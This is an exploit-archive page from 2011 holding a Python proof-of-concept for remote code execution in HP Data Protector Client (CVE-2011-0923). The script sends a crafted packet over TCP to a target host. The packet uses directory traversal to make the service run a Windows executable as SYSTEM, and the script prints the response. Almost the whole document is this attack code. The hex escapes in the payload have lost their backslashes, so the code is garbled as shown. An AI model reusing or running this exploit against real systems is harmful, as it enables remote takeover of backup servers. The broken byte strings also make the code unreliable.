Home / exploits HP Data Protector Client Code Execution
Posted on 28 May 2011
# Exploit Title: HP Data Protector Client Remote Code Execution Vulnerability PoC (ZDI-11-055) # Date: 2011-05-28 # Coded by: fdisk # Version: 6.11 # Tested on: Windows 2003 Server SP2 en # CVE: CVE-2011-0923 # Notes: ZDI-11-055 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143 import socket import sys if len(sys.argv) != 3: print "Usage: ./HPDataProtectorRCE.py <Target IP> <Port>" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) payload = ( "x00x00x00xa4x20x32x00x20x66x64x69x73x6bx79x6fx75" "x00x20x30x00x20x53x59x53x54x45x4dx00x20x66x64x69" "x73x6bx79x6fx75x00x20x43x00x20x32x30x00x20x66x64" "x69x73x6bx79x6fx75x00x20x50x6fx63x00x20x4ex54x41" "x55x54x48x4fx52x49x54x59x00x20x4ex54x41x55x54x48" "x4fx52x49x54x59x00x20x4ex54x41x55x54x48x4fx52x49" "x54x59x00x20x30x00x20x30x00x20x2ex2ex2fx2ex2ex2f" "x2ex2ex2fx2ex2ex2fx2ex2ex2fx2ex2ex2fx2ex2ex2fx2e" "x2ex2fx2ex2ex2fx2ex2ex2fx5cx77x69x6ex64x6fx77x73" "x5cx73x79x73x74x65x6dx33x32x5cx69x70x63x6fx6ex66" "x69x67x2ex65x78x65x00x00") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) while 1: data = s.recv(4096) if data: print data else: break s.close()
